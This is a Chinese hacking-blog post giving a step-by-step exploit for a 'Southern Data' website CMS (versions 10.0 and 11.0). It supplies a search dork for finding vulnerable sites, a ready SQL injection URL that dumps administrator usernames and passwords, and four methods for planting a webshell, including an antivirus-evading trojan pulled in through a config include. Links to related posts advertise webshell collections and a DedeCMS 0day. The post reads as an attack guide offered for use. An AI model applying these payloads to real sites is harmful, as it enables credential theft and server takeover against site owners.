南方数据网站漏洞

hacker5年前黑客文章1465

漏洞影响版本 v10.0 v11.0

关键字:inurl:”HomeMarket.asp”

默认后台:/admin

直接爆用户密码:
http://www.xxx.com/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’

拿shell *** 貌似有4种:

1、注册用户上传拿shell,这个比较直接,可以不进后台和在不知道用户名密码的情况下。

2、进后台备份数据库

3、在网站配置的版权信息里插入一句话,一句话地址写入到http://www.xxx.com/inc/config.asp3.1、另外一种插配置:之一步  网站配置添加TXT保存成功后第2步传一个TXT小马小马要免杀的。第3步  网站配置 利用包含得到小马”%><!–#include file=”201331420455473.txt “–><%’填入网站配置。

4、编辑器:/admin/southidceditor/admin_style.asp

标签: 黑客技术

相关文章

Nexpose免费下载

Nexpose免费下载

近期在科学研究Metasploit,发觉Metasploit集成化了Nexpose,因为在网上各种各样材料很乱,我是搜索了很长期才历经分类整理共享给大伙儿;   Rapid7 Nexpos...

DedeCMS会员中心短消息SQL注射0day漏洞

需要:magic_quotes_gpc = Off DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码: http://www.chncto.com/de/membe...

PHP一句话木马全集

PHP一句话木马全集

因为PHP一句话木马可以说有很多,简易的、中等水平的、繁杂的.......,今日主要是共享一些较为强大的一些PHP一句话木马全集;   一、运用404错误页掩藏PHP小龙 <!DOC...

网站渗透思路全方面总结

针对新手写一点渗透的小思路、小技巧,主要讲的是思路,所有不会太详细。 经常逛一些好的博客或者门户站,坚持下来,每天学一点思路,你会积累到很多东西,记住:技术需要时间沉淀。 (一)针对网...

专用工具完全免费使用方法

专用工具完全免费使用方法

什么叫Wfuzz? Wfuzz是一种用以强制性应用Web程序运行的黑客工具。该专用工具的一些作用包含好几个引入点作用,好几个词典,輸出到HTML,递归(实行文件目录bruteforce),五颜六色輸...

Fiddler是一款免费代理商调节专用工具

Fiddler是一款免费代理商调节专用工具

Fiddler是一款免费代理商调节专用工具。   Fiddler是一个蛮好用的抓包工具,能够将数据传输推送与接纳的数据文件开展捕获、再发、编写、拷贝到等实际操作。还可以用于检验网络信息安全...